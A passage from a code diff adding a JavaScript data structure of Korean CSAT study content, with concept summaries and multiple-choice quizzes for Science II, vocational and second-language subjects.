+              content: "대기는 온도와 압력에 따라 여러 층으로 구분되며, 대류와 복사 과정이 기후를 결정한다. 지구 자전과 공전으로 인해 계절과 기압대가 형성된다. 기후 변화와 온실 효과의 원리도 이해해야 한다."
+            },
+            {
+              title: "지질 변화",
+              content: "지구 표면은 풍화, 침식, 퇴적 과정으로 끊임없이 변화한다. 화산과 지진은 판 경계에서 발생하며, 지질 시대의 화석은 생물 진화와 환경 변화를 보여준다. 수능에서는 지질 구조와 암석 순환을 분석한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "지구 내부 구조를 알기 위해 사용하는 방법은?",
+              options: ["자기장 측정", "지진파 분석", "풍속 관측", "해수 분석", "강수량 측정"],
+              answer: 1,
+              explanation: "지진파의 속도와 굴절로 내부 구조를 추정한다."
+            },
+            {
+              q: "온실 효과의 주요 원인은?",
+              options: ["대기 중 이산화탄소 증가", "해수 염분 감소", "빙하 증가", "대기 산소 증가", "태양 활동 감소"],
+              answer: 0,
+              explanation: "이산화탄소 증가가 온실 효과를 강화한다."
+            },
+            {
+              q: "암석 순환의 과정으로 옳지 않은 것은?",
+              options: ["화성암", "퇴적암", "변성암", "기체암", "풍화"],
+              answer: 3,
+              explanation: "기체암은 암석 순환 과정에 해당하지 않는다."
+            }
+          ]
+        },
+        "물리학Ⅱ": {
+          concepts: [
+            {
+              title: "전기장과 전위",
+              content: "전기장은 전하가 만드는 힘의 공간적 분포이며, 전위는 단위 전하가 가지는 위치 에너지다. 전기장과 전위의 관계를 이해하면 축전기 문제를 해결할 수 있다. 수능에서는 전기력의 방향과 크기를 계산하는 문제가 출제된다."
+            },
+            {
+              title: "전자기 유도",
+              content: "자기장이 변하면 유도 기전력이 발생하며, 패러데이 법칙과 렌츠 법칙으로 방향과 크기를 결정한다. 발전기, 변압기 원리가 이에 해당한다. 수능에서는 코일의 변화율과 유도 전류 방향을 묻는다."
+            },
+            {
+              title: "파동의 중첩",
+              content: "파동의 중첩 원리는 두 파동이 만나면 변위가 합성된다는 원리다. 간섭과 정상파는 중첩의 결과이며, 마디와 배의 위치를 계산해 파장의 관계를 분석한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "전기장의 방향은 무엇을 기준으로 하는가?",
+              options: ["음전하가 받는 힘", "양전하가 받는 힘", "자기장 방향", "전류 방향", "중력 방향"],
+              answer: 1,
+              explanation: "전기장은 양전하가 받는 힘의 방향으로 정의된다."
+            },
+            {
+              q: "렌츠 법칙의 의미는?",
+              options: ["유도 전류는 변화 방해", "전류는 항상 증가", "자기장 고정", "전류는 무시", "전기력은 무관"],
+              answer: 0,
+              explanation: "렌츠 법칙은 유도 전류가 자기장 변화를 방해하는 방향으로 흐른다는 것이다."
+            },
+            {
+              q: "정상파에서 마디와 마디 사이 거리는?",
+              options: ["파장", "반파장", "2파장", "1/4파장", "0"],
+              answer: 1,
+              explanation: "정상파에서 마디와 마디 사이 거리는 반파장이다."
+            }
+          ]
+        },
+        "화학Ⅱ": {
+          concepts: [
+            {
+              title: "화학 평형",
+              content: "화학 평형은 정반응과 역반응 속도가 같아지는 상태다. 평형 상수는 반응물과 생성물 농도의 비로 나타나며, 온도와 압력 변화에 따라 평형이 이동한다. 르샤틀리에 원리를 적용해 방향을 판단해야 한다."
+            },
+            {
+              title: "산화·환원 반응",
+              content: "산화는 전자를 잃는 과정, 환원은 전자를 얻는 과정이다. 산화수 변화로 반응을 분석하고, 산화제와 환원제의 역할을 구분해야 한다. 전지 원리와 연결되어 전기화학 문제에 활용된다."
+            },
+            {
+              title: "반응 속도론",
+              content: "반응 속도는 농도, 온도, 촉매, 표면적에 영향을 받는다. 활성화 에너지가 낮아지면 반응 속도가 증가하며, 속도 결정 단계가 전체 반응 속도를 좌우한다. 실험 그래프 해석이 중요하다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "르샤틀리에 원리의 의미는?",
+              options: ["평형은 고정", "조건 변화에 대응", "속도 증가", "온도 무관", "농도 무시"],
+              answer: 1,
+              explanation: "평형은 조건 변화에 대응해 이동한다."
+            },
+            {
+              q: "산화 과정의 특징은?",
+              options: ["전자를 얻음", "전자를 잃음", "산화수 감소", "환원제 감소", "에너지 흡수 없음"],
+              answer: 1,
+              explanation: "산화는 전자를 잃는 과정이다."
+            },
+            {
+              q: "반응 속도를 빠르게 하는 요인이 아닌 것은?",
+              options: ["온도 증가", "촉매 사용", "농도 감소", "표면적 증가", "압력 증가"],
+              answer: 2,
+              explanation: "농도 감소는 반응 속도를 느리게 한다."
+            }
+          ]
+        },
+        "생명과학Ⅱ": {
+          concepts: [
+            {
+              title: "세포 분열",
+              content: "세포 분열은 체세포 분열과 감수 분열로 구분된다. 체세포 분열은 동일한 유전 정보를 가진 세포를 만들고, 감수 분열은 생식세포를 형성하여 유전적 다양성을 높인다. 각 단계의 염색체 변화를 이해해야 한다."
+            },
+            {
+              title: "유전자 발현",
+              content: "유전자 발현은 DNA의 정보가 RNA와 단백질로 전달되는 과정이다. 전사와 번역 단계가 있으며, 조절 유전자가 발현 수준을 조절한다. 수능에서는 유전자 발현 과정과 돌연변이의 영향을 분석한다."
+            },
+            {
+              title: "생태계 에너지 흐름",
+              content: "생태계에서 에너지는 생산자에서 소비자로 이동하면서 일부가 열로 손실된다. 에너지 효율은 낮아 상위 영양 단계로 갈수록 개체 수가 감소한다. 생태 피라미드를 해석해 에너지 흐름을 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "감수 분열의 결과로 나타나는 특징은?",
+              options: ["유전 정보 동일", "염색체 수 절반", "세포 수 감소", "에너지 증가", "DNA 복제 없음"],
+              answer: 1,
+              explanation: "감수 분열은 염색체 수를 절반으로 만든다."
+            },
+            {
+              q: "유전자 발현 과정에 포함되는 단계는?",
+              options: ["전사와 번역", "복제와 분열", "흡수와 배설", "호흡과 광합성", "분화와 노화"],
+              answer: 0,
+              explanation: "유전자 발현은 전사와 번역 과정을 포함한다."
+            },
+            {
+              q: "생태 피라미드에서 상위 영양 단계의 특징은?",
+              options: ["에너지 증가", "개체 수 증가", "에너지 감소", "생산자 증가", "열 손실 없음"],
+              answer: 2,
+              explanation: "상위 영양 단계로 갈수록 에너지가 감소한다."
+            }
+          ]
+        },
+        "지구과학Ⅱ": {
+          concepts: [
+            {
+              title: "판 구조론",
+              content: "지구의 지각은 여러 판으로 구성되어 있으며, 판의 이동은 맨틀 대류에 의해 발생한다. 판 경계에서는 해령, 해구, 산맥이 형성되고, 지진과 화산 활동이 활발하다. 판 경계 유형을 구분하는 것이 중요하다."
+            },
+            {
+              title: "천체 관측",
+              content: "천체의 위치와 밝기는 지구의 자전과 공전에 영향을 받는다. 별의 일주 운동, 행성의 공전 주기, 스펙트럼 분석을 통해 천체의 성질을 파악한다. 수능에서는 별의 밝기와 거리 관계를 해석한다."
+            },
+            {
+              title: "기후 변화",
+              content: "기후 변화는 자연적 요인과 인간 활동이 복합적으로 작용한다. 온실가스 증가, 태양 활동 변화, 화산 분출 등이 기후에 영향을 미치며, 장기적 변화는 생태계와 인류 사회에 큰 영향을 준다. 과학적 근거를 기반으로 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "판 경계에서 주로 발생하는 현상은?",
+              options: ["지진", "사막화", "빙하 확대", "무풍", "중력 감소"],
+              answer: 0,
+              explanation: "판 경계에서는 지진과 화산 활동이 활발하다."
+            },
+            {
+              q: "별의 밝기와 거리 관계로 옳은 것은?",
+              options: ["거리와 무관", "거리가 멀수록 밝기 감소", "거리가 멀수록 밝기 증가", "거리와 비례", "거리와 상관없음"],
+              answer: 1,
+              explanation: "거리가 멀수록 별의 밝기는 감소한다."
+            },
+            {
+              q: "기후 변화의 원인으로 옳지 않은 것은?",
+              options: ["온실가스 증가", "태양 활동 변화", "화산 분출", "자전 중단", "산업화"],
+              answer: 3,
+              explanation: "지구 자전 중단은 현실적인 기후 변화 원인이 아니다."
+            }
+          ]
+        }
+      },
+      "직업탐구": {
+        "성공적인 직업생활": {
+          concepts: [
+            {
+              title: "직업 윤리",
+              content: "직업 윤리는 전문성을 바탕으로 사회적 책임을 실천하는 태도다. 공정성, 성실성, 고객 존중을 포함하며, 조직 내 신뢰 형성에 핵심 역할을 한다. 수능에서는 직업 윤리의 실제 적용 사례를 분석하는 문제가 출제된다."
+            },
+            {
+              title: "커리어 설계",
+              content: "커리어 설계는 자기 이해, 직무 탐색, 목표 설정, 역량 개발의 순서로 이루어진다. 변화하는 산업 구조에 맞춰 지속적으로 학습해야 하며, 직업 세계의 트렌드를 반영하는 것이 중요하다."
+            },
+            {
+              title: "의사소통과 협업",
+              content: "직장 내 의사소통은 명확한 정보 전달과 협업을 위한 조율이 핵심이다. 수평적 소통과 피드백 문화는 조직 성과에 긍정적 영향을 미치며, 갈등을 관리하는 방법도 필수 역량이다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "직업 윤리의 핵심 요소로 옳은 것은?",
+              options: ["개인 이익 우선", "공정성과 책임", "비밀 유지 무시", "성과만 강조", "경쟁 회피"],
+              answer: 1,
+              explanation: "직업 윤리는 공정성과 책임을 강조한다."
+            },
+            {
+              q: "커리어 설계 단계에 포함되지 않는 것은?",
+              options: ["자기 이해", "직무 탐색", "목표 설정", "성과 왜곡", "역량 개발"],
+              answer: 3,
+              explanation: "성과 왜곡은 커리어 설계와 관련이 없다."
+            },
+            {
+              q: "협업을 강화하는 방법으로 적절한 것은?",
+              options: ["피드백 차단", "명확한 의사소통", "갈등 방치", "정보 독점", "무관심"],
+              answer: 1,
+              explanation: "명확한 의사소통과 피드백이 협업을 강화한다."
+            }
+          ]
+        },
+        "농업 기초 기술": {
+          concepts: [
+            {
+              title: "작물 생육 조건",
+              content: "작물의 생육은 빛, 온도, 수분, 토양의 영향을 받는다. 광합성 효율과 토양 비옥도는 수확량과 직결되므로, 적절한 생육 조건 관리가 중요하다. 수능에서는 생육 조건과 작물 생산성을 연결해 분석한다."
+            },
+            {
+              title: "토양 관리",
+              content: "토양은 물리적·화학적 성질을 가지고 있으며, 유기물 공급과 배수 개선이 필요하다. 토양 산성도 조절, 비료 사용, 윤작은 토양 비옥도를 유지하는 핵심 방법이다."
+            },
+            {
+              title: "농업 기술과 자동화",
+              content: "스마트 농업은 센서와 데이터 분석을 통해 환경을 제어하고 노동력을 줄인다. 자동 관개 시스템과 드론 활용이 대표적이다. 기술 발전이 농업 생산성과 지속 가능성을 높이는 방식에 주목해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "작물 생육에 가장 중요한 환경 요소는?",
+              options: ["빛", "소음", "가로등", "도심 밀도", "교통량"],
+              answer: 0,
+              explanation: "빛은 광합성에 필수적인 요소이다."
+            },
+            {
+              q: "토양 비옥도를 높이는 방법으로 옳은 것은?",
+              options: ["유기물 공급", "토양 방치", "과도한 염분", "수분 차단", "경작 중단"],
+              answer: 0,
+              explanation: "유기물 공급과 윤작은 토양 비옥도를 높인다."
+            },
+            {
+              q: "스마트 농업의 특징으로 옳은 것은?",
+              options: ["환경 데이터 활용", "노동력 증가", "관개 자동화 무시", "수확량 감소", "기술 배제"],
+              answer: 0,
+              explanation: "스마트 농업은 환경 데이터를 활용해 생산성을 높인다."
+            }
+          ]
+        },
+        "공업 일반": {
+          concepts: [
+            {
+              title: "제조 공정",
+              content: "제조 공정은 설계, 가공, 조립, 품질 관리의 단계로 구성된다. 공정 간 연계와 효율성을 높이기 위해 자동화와 표준화가 중요하며, 수능에서는 공정 흐름과 품질 관리 방법을 이해해야 한다."
+            },
+            {
+              title: "안전 관리",
+              content: "산업 현장은 기계 사고, 화학 물질 노출 등 위험이 있으므로 안전 수칙과 보호 장비 착용이 필수다. 위험성 평가와 예방 조치가 생산성과 직결되며, 산업 안전법의 기본 원리를 이해해야 한다."
+            },
+            {
+              title: "품질 관리",
+              content: "품질 관리는 제품의 규격과 성능을 유지하기 위한 체계다. 통계적 품질 관리, 검사 기준, 공정 개선이 포함된다. 수능에서는 불량률 감소와 품질 개선 전략을 분석하는 문제가 출제된다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "제조 공정의 기본 순서로 옳은 것은?",
+              options: ["조립-설계-가공", "설계-가공-조립", "가공-설계-조립", "품질-설계-가공", "조립-품질-설계"],
+              answer: 1,
+              explanation: "제조 공정은 설계-가공-조립 순으로 진행된다."
+            },
+            {
+              q: "산업 안전 관리의 목적은?",
+              options: ["생산 중단", "사고 예방", "비용 증가", "품질 저하", "작업 축소"],
+              answer: 1,
+              explanation: "안전 관리는 사고를 예방하고 작업 환경을 보호한다."
+            },
+            {
+              q: "품질 관리에서 통계적 방법을 사용하는 이유는?",
+              options: ["무작위 검사", "불량률 분석", "시간 단축", "비용 무시", "기계 고장"],
+              answer: 1,
+              explanation: "통계적 방법으로 불량률을 분석하고 공정을 개선한다."
+            }
+          ]
+        },
+        "상업 경제": {
+          concepts: [
+            {
+              title: "기업의 재무 구조",
+              content: "기업의 재무 구조는 자산, 부채, 자본으로 구성되며, 재무 비율을 통해 건전성을 평가한다. 유동성, 수익성, 안정성 지표가 대표적이며, 재무제표를 분석하는 능력이 중요하다."
+            },
+            {
+              title: "시장과 경쟁",
+              content: "시장 구조는 완전 경쟁, 독점, 과점 등으로 구분된다. 각 구조는 가격 결정 방식과 기업 전략에 영향을 준다. 수능에서는 시장 구조별 특징과 소비자 후생 변화를 분석한다."
+            },
+            {
+              title: "마케팅 전략",
+              content: "마케팅은 제품, 가격, 유통, 촉진(4P) 전략으로 구성된다. 시장 조사와 소비자 분석을 통해 적절한 전략을 수립해야 하며, 브랜드 가치와 고객 만족이 중요하다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "재무제표의 구성 요소로 옳은 것은?",
+              options: ["자산", "기후", "인구", "지형", "세대"],
+              answer: 0,
+              explanation: "재무제표는 자산, 부채, 자본으로 구성된다."
+            },
+            {
+              q: "완전 경쟁 시장의 특징은?",
+              options: ["가격 결정권 없음", "독점적 가격", "진입 제한", "정보 불균형", "공급 부족"],
+              answer: 0,
+              explanation: "완전 경쟁 시장에서는 개별 기업이 가격 결정권을 갖지 못한다."
+            },
+            {
+              q: "마케팅 4P에 포함되지 않는 것은?",
+              options: ["제품", "가격", "유통", "촉진", "생산량"],
+              answer: 4,
+              explanation: "4P는 제품, 가격, 유통, 촉진으로 구성된다."
+            }
+          ]
+        },
+        "수산·해운 산업 기초": {
+          concepts: [
+            {
+              title: "수산 자원 관리",
+              content: "수산 자원은 남획과 환경 변화로 감소할 수 있으므로 관리가 필요하다. 금어기 설정, 어획량 제한, 인공 종묘 방류 등 지속 가능한 어업 전략이 중요하다. 수능에서는 수산 자원 관리의 필요성을 이해해야 한다."
+            },
+            {
+              title: "해운 물류",
+              content: "해운 물류는 항만, 선박, 물류 네트워크로 구성된다. 글로벌 무역의 상당 부분이 해상 운송에 의존하며, 효율적인 항만 운영과 물류 관리가 중요하다. 수능에서는 해운 산업의 역할과 흐름을 분석한다."
+            },
+            {
+              title: "해양 안전",
+              content: "해양 안전은 선박 운항 규칙, 기상 정보, 구조 시스템을 포함한다. 해양 사고를 예방하기 위해 국제 규약을 준수하고, 선박 안전 점검을 수행해야 한다. 안전 관리가 산업 지속성을 좌우한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "수산 자원 관리 방법으로 옳은 것은?",
+              options: ["남획 허용", "금어기 설정", "무제한 어획", "환경 오염 확대", "규제 폐지"],
+              answer: 1,
+              explanation: "금어기 설정은 자원 회복을 돕는다."
+            },
+            {
+              q: "해운 산업의 특징으로 옳은 것은?",
+              options: ["항공 운송만 활용", "해상 운송 중심", "철도 운송 중심", "내륙 운송 중심", "수송 불필요"],
+              answer: 1,
+              explanation: "해운 산업은 해상 운송을 중심으로 한다."
+            },
+            {
+              q: "해양 안전 관리의 목적은?",
+              options: ["사고 예방", "운항 제한", "교역 감소", "항만 폐쇄", "물류 중단"],
+              answer: 0,
+              explanation: "해양 안전 관리의 핵심 목적은 사고 예방이다."
+            }
+          ]
+        },
+        "인간 발달": {
+          concepts: [
+            {
+              title: "발달 단계",
+              content: "인간 발달은 영아기, 유아기, 아동기, 청소년기, 성인기, 노년기로 구분된다. 각 단계는 신체적·인지적·사회적 특성이 다르며, 발달 과업을 이해해야 한다. 수능에서는 단계별 특징을 비교하는 문제가 출제된다."
+            },
+            {
+              title: "인지 발달",
+              content: "피아제의 인지 발달 이론은 감각 운동기, 전조작기, 구체적 조작기, 형식적 조작기로 구분된다. 각 단계는 사고 능력의 확장과 관련되며, 연령에 따른 인지 특성을 이해해야 한다."
+            },
+            {
+              title: "사회 정서 발달",
+              content: "사회 정서 발달은 애착 형성, 자아 정체성, 대인 관계 능력의 발전을 포함한다. 청소년기에는 자아 정체성 확립이 핵심 과업이며, 사회적 경험이 발달에 영향을 준다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "청소년기의 주요 발달 과업은?",
+              options: ["자아 정체성 확립", "기본 신뢰 형성", "운동 능력 발달", "언어 습득", "치아 교환"],
+              answer: 0,
+              explanation: "청소년기의 핵심 과업은 자아 정체성 확립이다."
+            },
+            {
+              q: "피아제 이론의 형식적 조작기 특징은?",
+              options: ["감각 운동 중심", "추상적 사고 가능", "구체적 경험만", "언어 미발달", "사회적 규범 부재"],
+              answer: 1,
+              explanation: "형식적 조작기에는 추상적 사고가 가능하다."
+            },
+            {
+              q: "애착 형성은 주로 어느 시기에 중요한가?",
+              options: ["영아기", "청소년기", "성인기", "노년기", "중년기"],
+              answer: 0,
+              explanation: "애착 형성은 영아기에 중요한 발달 과업이다."
+            }
+          ]
+        }
+      },
+      "제2외국어/한문": {
+        "독일어Ⅰ": {
+          concepts: [
+            {
+              title: "기초 인사 표현",
+              content: "독일어 인사 표현은 아침, 낮, 저녁에 따라 다르게 사용된다. Guten Morgen, Guten Tag, Guten Abend 등의 표현이 대표적이며, 상황에 맞는 공손한 표현을 익히는 것이 중요하다."
+            },
+            {
+              title: "기본 문장 구조",
+              content: "독일어는 기본적으로 동사가 2번째 위치에 오는 어순을 가진다. 주어와 목적어의 위치가 변하더라도 동사 위치는 규칙적으로 유지되므로 문장 구성의 기본을 이해해야 한다."
+            },
+            {
+              title: "명사의 성",
+              content: "독일어 명사는 남성, 여성, 중성으로 구분되며 관사 변화에 영향을 미친다. 성에 따라 der, die, das를 사용하며, 격 변화도 함께 적용된다. 수능에서는 기본 관사와 성 구분을 묻는 문제가 등장한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "Guten Morgen은 언제 사용하는 인사인가?",
+              options: ["아침", "점심", "저녁", "밤", "새벽"],
+              answer: 0,
+              explanation: "Guten Morgen은 아침 인사이다."
+            },
+            {
+              q: "독일어 문장에서 동사의 위치는 보통 어디인가?",
+              options: ["맨 앞", "2번째", "맨 뒤", "임의", "주어 뒤"],
+              answer: 1,
+              explanation: "독일어는 동사가 일반적으로 두 번째 위치에 온다."
+            },
+            {
+              q: "중성 명사의 정관사는?",
+              options: ["der", "die", "das", "den", "dem"],
+              answer: 2,
+              explanation: "중성 명사의 정관사는 das이다."
+            }
+          ]
+        },
+        "프랑스어Ⅰ": {
+          concepts: [
+            {
+              title: "인칭 대명사",
+              content: "프랑스어 인칭 대명사는 주어 위치에서 je, tu, il/elle, nous, vous, ils/elles를 사용한다. 동사 활용과 연결되어 문장 구성의 기본이 되며, 존칭 표현과 관련된 vous 사용이 중요하다."
+            },
+            {
+              title: "기본 동사 활용",
+              content: "프랑스어 동사는 -er, -ir, -re로 분류되며 규칙 활용이 있다. être, avoir는 불규칙 동사로 자주 쓰이므로 기본 활용을 암기해야 한다. 수능에서는 기본 시제 변화와 동사 활용을 묻는다."
+            },
+            {
+              title: "형용사 위치",
+              content: "프랑스어 형용사는 명사 앞이나 뒤에 위치하며, 의미에 따라 위치가 달라질 수 있다. 일반적으로 명사 뒤에 오는 경우가 많으나, 짧고 자주 쓰이는 형용사는 명사 앞에 위치한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "프랑스어 1인칭 단수 주어는?",
+              options: ["je", "tu", "il", "nous", "vous"],
+              answer: 0,
+              explanation: "1인칭 단수 주어는 je이다."
+            },
+            {
+              q: "être 동사의 의미는?",
+              options: ["가지다", "하다", "이다", "가다", "오다"],
+              answer: 2,
+              explanation: "être는 '이다'를 의미한다."
+            },
+            {
+              q: "형용사가 명사 앞에 위치하는 경우로 옳은 것은?",
+              options: ["긴 형용사", "색깔 형용사", "짧고 자주 쓰이는 형용사", "복잡한 형용사", "부정확한 형용사"],
+              answer: 2,
+              explanation: "짧고 자주 쓰이는 형용사는 명사 앞에 위치한다."
+            }
+          ]
+        },
+        "스페인어Ⅰ": {
+          concepts: [
+            {
+              title: "인사와 자기소개",
+              content: "스페인어 인사는 Hola, Buenos días, Buenas tardes 등으로 구분된다. 자기소개에서는 Me llamo~ 표현을 사용하며, 이름과 출신을 자연스럽게 말하는 연습이 중요하다."
+            },
+            {
+              title: "성별 명사",
+              content: "스페인어 명사는 남성형과 여성형으로 구분되며, 보통 -o는 남성, -a는 여성이다. 관사 el, la와 형용사가 명사의 성과 수에 맞게 변화한다."
+            },
+            {
+              title: "기본 동사 ser/estar",
+              content: "ser와 estar는 모두 '이다'로 번역되지만 용법이 다르다. ser는 본질적 성질, estar는 일시적 상태나 위치를 나타낸다. 수능에서는 상황에 따라 적절한 동사를 선택하는 문제가 출제된다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "Buenos días는 언제 사용하는 인사인가?",
+              options: ["아침", "저녁", "밤", "새벽", "항상"],
+              answer: 0,
+              explanation: "Buenos días는 아침 인사이다."
+            },
+            {
+              q: "스페인어 남성 단수 정관사는?",
+              options: ["la", "el", "los", "las", "un"],
+              answer: 1,
+              explanation: "남성 단수 정관사는 el이다."
+            },
+            {
+              q: "일시적 상태를 표현할 때 사용하는 동사는?",
+              options: ["ser", "estar", "tener", "hacer", "ir"],
+              answer: 1,
+              explanation: "일시적 상태는 estar를 사용한다."
+            }
+          ]
+        },
+        "중국어Ⅰ": {
+          concepts: [
+            {
+              title: "성모와 운모",
+              content: "중국어 병음은 성모와 운모의 결합으로 이루어진다. 성모는 자음, 운모는 모음을 의미하며, 결합 방식에 따라 발음이 달라진다. 기초 음절을 정확히 익히는 것이 중요하다."
+            },
+            {
+              title: "성조",
+              content: "중국어는 4개의 성조와 경성으로 의미가 달라진다. 동일한 음절이라도 성조에 따라 의미가 달라지므로 정확한 발음이 중요하다. 수능에서는 성조를 구분하는 문제도 출제된다."
+            },
+            {
+              title: "기본 문장 구조",
+              content: "중국어 문장은 주어-동사-목적어 구조를 기본으로 한다. 시간이나 장소 부사는 동사 앞에 위치하는 경우가 많으며, 어순의 규칙성을 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "중국어 성조의 개수는?",
+              options: ["2개", "3개", "4개", "5개", "6개"],
+              answer: 2,
+              explanation: "중국어는 4개의 성조를 가진다."
+            },
+            {
+              q: "중국어 문장의 기본 어순은?",
+              options: ["동사-주어-목적어", "주어-동사-목적어", "목적어-동사-주어", "주어-목적어-동사", "무작위"],
+              answer: 1,
+              explanation: "중국어는 주어-동사-목적어 어순을 기본으로 한다."
+            },
+            {
+              q: "성모와 운모의 결합이 중요한 이유는?",
+              options: ["문법 때문", "발음 형성", "성조 삭제", "뜻 무시", "글자 수"],
+              answer: 1,
+              explanation: "성모와 운모의 결합이 음절 발음을 만든다."
+            }
+          ]
+        },
+        "일본어Ⅰ": {
+          concepts: [
+            {
+              title: "히라가나와 가타카나",
+              content: "일본어는 히라가나와 가타카나 두 종류의 음절 문자를 사용한다. 히라가나는 기본 표현에, 가타카나는 외래어 표현에 주로 사용된다. 두 문자 체계를 정확히 구분하는 것이 중요하다."
+            },
+            {
+              title: "기본 조사",
+              content: "일본어 조사는 문장 내 역할을 나타내는 요소로, は, が, を, に 등이 있다. 조사의 선택에 따라 문장의 의미가 달라지므로 용법을 정확히 이해해야 한다."
+            },
+            {
+              title: "동사의 활용",
+              content: "일본어 동사는 う동사, る동사로 구분되며, 시제와 존댓말에 따라 활용이 달라진다. 기본형과 ます형의 변환을 익히면 기초 문장을 만들 수 있다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "가타카나의 주요 용도는?",
+              options: ["외래어", "한자", "조사", "동사", "형용사"],
+              answer: 0,
+              explanation: "가타카나는 외래어 표기에 주로 사용된다."
+            },
+            {
+              q: "조사 を 의 역할은?",
+              options: ["주어 표시", "목적어 표시", "주제 표시", "장소 표시", "수단 표시"],
+              answer: 1,
+              explanation: "を는 목적어를 표시한다."
+            },
+            {
+              q: "ます형은 어떤 상황에서 사용되는가?",
+              options: ["비격식", "격식", "무시", "감탄", "부정"],
+              answer: 1,
+              explanation: "ます형은 격식 있는 표현에서 사용된다."
+            }
+          ]
+        },
+        "러시아어Ⅰ": {
+          concepts: [
+            {
+              title: "키릴 문자",
+              content: "러시아어는 키릴 문자를 사용하며, 알파벳 형태가 영어와 달라 발음을 정확히 익혀야 한다. 문자와 발음의 대응 관계를 이해하는 것이 읽기와 말하기의 기초다."
+            },
+            {
+              title: "성·수·격",
+              content: "러시아어 명사는 성(남성, 여성, 중성)과 수(단수, 복수), 격 변화가 있다. 격은 문장 내 역할을 나타내며, 어미 변화를 통해 표현된다. 기초 격 변화 규칙을 익혀야 한다."
+            },
+            {
+              title: "기본 문장 구조",
+              content: "러시아어는 비교적 자유로운 어순을 가지지만, 기본적으로 주어-동사-목적어 구조를 사용한다. 강조하고 싶은 요소에 따라 어순이 달라질 수 있어 문맥을 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "러시아어 문자 체계는 무엇인가?",
+              options: ["라틴 문자", "키릴 문자", "한자", "히라가나", "데바나가리"],
+              answer: 1,
+              explanation: "러시아어는 키릴 문자를 사용한다."
+            },
+            {
+              q: "러시아어 명사가 가지는 문법적 범주로 옳은 것은?",
+              options: ["성", "수", "격", "모두", "없음"],
+              answer: 3,
+              explanation: "러시아어 명사는 성, 수, 격을 모두 가진다."
+            },
+            {
+              q: "러시아어 어순의 특징은?",
+              options: ["엄격한 고정", "비교적 자유", "항상 동사 먼저", "항상 목적어 먼저", "어순 없음"],
+              answer: 1,
+              explanation: "러시아어는 어순이 비교적 자유로운 편이다."
+            }
+          ]
+        },
+        "아랍어Ⅰ": {
+          concepts: [
+            {
+              title: "문자 방향",
+              content: "아랍어는 오른쪽에서 왼쪽으로 쓰는 문자 체계를 가진다. 글자의 형태는 위치에 따라 변화하므로, 단어 안에서 글자가 어떻게 연결되는지 이해해야 한다."
+            },
+            {
+              title: "기본 인사 표현",
+              content: "아랍어 인사는 상황에 따라 다양한 표현을 사용하며, salam과 같은 평화의 인사가 대표적이다. 종교적 문화적 맥락이 반영된 표현이 많아 의미를 이해하는 것이 중요하다."
+            },
+            {
+              title: "동사의 어근",
+              content: "아랍어는 어근 중심의 언어로, 세 자음 어근이 의미를 형성한다. 어근에 모음과 접사 변화가 결합되어 다양한 단어와 시제를 만든다. 어근 체계를 이해하면 어휘 학습이 효율적이다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "아랍어의 문자 방향은?",
+              options: ["왼쪽→오른쪽", "오른쪽→왼쪽", "위→아래", "아래→위", "자유"],
+              answer: 1,
+              explanation: "아랍어는 오른쪽에서 왼쪽으로 쓴다."
+            },
+            {
+              q: "아랍어 어근의 특징은?",
+              options: ["두 자음", "세 자음", "네 자음", "모음 중심", "어근 없음"],
+              answer: 1,
+              explanation: "아랍어는 세 자음 어근을 중심으로 단어를 만든다."
+            },
+            {
+              q: "아랍어 글자의 형태는 무엇에 따라 달라지는가?",
+              options: ["글자 위치", "글자 색", "발음 속도", "문장 길이", "모음 수"],
+              answer: 0,
+              explanation: "글자의 위치(단어 처음·중간·끝)에 따라 형태가 달라진다."
+            }
+          ]
+        },
+        "베트남어Ⅰ": {
+          concepts: [
+            {
+              title: "성조 체계",
+              content: "베트남어는 6개의 성조를 가지며, 성조에 따라 의미가 달라진다. 동일한 철자라도 성조가 다르면 완전히 다른 단어가 되므로 정확한 발음이 중요하다."
+            },
+            {
+              title: "기본 어순",
+              content: "베트남어는 주어-동사-목적어 어순을 기본으로 하며, 형용사는 명사 뒤에 위치하는 경우가 많다. 간단한 문장 구조를 익히면 읽기와 말하기에 도움이 된다."
+            },
+            {
+              title: "친족 표현",
+              content: "베트남어는 친족 관계에 따라 호칭이 세분화되어 있으며, 나이와 관계를 고려한 호칭 사용이 중요하다. 문화적 맥락을 이해하면 회화에서 자연스러운 표현을 사용할 수 있다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "베트남어 성조의 개수는?",
+              options: ["3개", "4개", "5개", "6개", "7개"],
+              answer: 3,
+              explanation: "베트남어는 6개의 성조를 가진다."
+            },
+            {
+              q: "베트남어 기본 어순은?",
+              options: ["주어-동사-목적어", "동사-주어-목적어", "목적어-동사-주어", "주어-목적어-동사", "자유"],
+              answer: 0,
+              explanation: "베트남어는 주어-동사-목적어 어순을 사용한다."
+            },
+            {
+              q: "베트남어 친족 표현에서 중요한 요소는?",
+              options: ["성조", "나이와 관계", "철자 수", "발음 속도", "문장 길이"],
+              answer: 1,
+              explanation: "나이와 관계에 따른 호칭 사용이 중요하다."
+            }
+          ]
+        },
+        "한문Ⅰ": {
+          concepts: [
+            {
+              title: "기본 한자 이해",
+              content: "한문은 한자를 기반으로 의미를 전달한다. 기본 한자의 부수와 의미를 이해하면 문장 해석이 쉬워지며, 자주 쓰이는 한자 어휘를 익히는 것이 중요하다."
+            },
+            {
+              title: "문장 구조",
+              content: "한문 문장은 주어-서술어-목적어 구조를 따르지만, 생략이 많아 문맥 파악이 필요하다. 허사와 조사 역할을 파악하면 문장의 의미를 정확히 해석할 수 있다."
+            },
+            {
+              title: "고전 문장 해석",
